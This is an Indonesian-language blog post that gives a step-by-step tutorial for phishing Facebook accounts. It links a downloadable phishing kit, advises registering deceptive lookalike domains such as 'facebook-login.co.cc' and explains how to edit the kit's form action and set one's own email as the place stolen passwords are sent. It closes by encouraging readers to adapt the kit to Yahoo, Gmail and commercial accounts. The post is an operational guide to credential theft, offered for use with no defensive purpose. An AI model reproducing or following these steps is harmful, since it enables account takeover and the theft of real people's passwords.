Jumat, 12 Februari 2010 di 20.25 Diposting oleh blog misteri 0 Comments

Kita akan membahas membahas bagaimana cara kerja 'phising' yang kita lakukan pada seseorang untuk mendapatkan account facebooknya, tidak mustahil juga beserta account emailnya juga bisa kita dapatkan karena kebiasaan buruk seseorang yang malas mengingat terlalu banyak password sehingga password email sama dengan password account dia pada web lain.Berhubung pada artikel sebelumnya teman-teman prakteknya langsung dari website ini yang mengakibatkan kotak inbox email saya juga banyak berisi email dan password account facebook yang masuk saat teman-teman praktekin, dan saya orangnya nggak begitu tega-an untuk mengutak-atik facebook seseorang BigGrin.gif ,maka di sini saya akan berbagi source code lengkap beserta cara penggunaanya.

• Langkah pertama silakan download source code lengkapnya di:


CODE
http://www.ziddu.com/download/6973259/source-fb.rar.html



Ekstrak file yang anda download karena dalam format .rar, dalam folder hasil ekstrakan tersebut terdapat 4 file :
- request.htm
- login.php.htm
- next_login.php
- login_act.php
• Daftarkan sebuah nama domain yang gratisan, contohnya pada co.cc atau php0h.com
usahakan nama domain yang anda daftarkan bersifat unik atau dapat menipu pandangan dalam sekilas, seperti :
- rand-usr-8g84mv475oc03-xwvt56-facebook.co.cc
- rand-usr-8g84mv475oc03-xwvt56-facebook.php0h.com
atau
- facebook-login.co.cc
- facebook-login.php0h.com
• Selanjutnya daftarkan tempat hostingan file anda pada web host gratisan seperti 000webhost.com.
Dari ketiga langkah tersebut kita sudah memiliki source code, nama domain dan web hosting untuk menempatkan file. sebelum mengupload file source tersebut ke dalam web hosting silakan ikuti petunjuk selanjutnya.
• Buka file login.php.htm pada folder source code yang sudah di download.
Cari baris yang berisi action="http://zero-bet.net/login_act.php" ganti kata/alamat zero-bet.net dengan nama domain anda!
• Buka file login_act.php
Cari baris yang berisi $tujuan="si.paok@yahoo.com"; ganti si.paok@yahoo.com dengan nama email anda sebagai tempat untuk mengirim password target kita nantinya!
• Buka file next_login.php cari semua kata/alamat zero-bet.net ganti dengan alamat domain anda.
Setelah semua langkah diatas anda ikuti dengan benar, silakan upload file tersebut pada direktori web server anda, kemudian setting DNS pada domain anda. Ketikkan pada Address bar browser anda : http://nama_domain_anda/request.htm untuk mengirim pesan request teman pada facebook! tunggulah beberapa saat maka anda akan mendapatkan email yang berisi username dan password untuk login pada facebook. BigGrin.gif
Kalau teman-teman sudah mahir menggunakan cara ini maka jangankan account facebook, account pada yahoo, gmail, atau account yang bersifat komersial lainnya pun dapat anda dapatkan dengan mudah, cukup dengan sedikit mengubah source pada program.
Sebagai contoh coba teman-teman lihat ini ups....itu bukan kerjaan aku ya...hehehhe
Jadi silakan berimajinasi sendiri, bagaimana cara anda mendapatkan 'sesuatu yang anda inginkan' dengan menggunakan source tersebut.

0 Responses so far.

Posting Komentar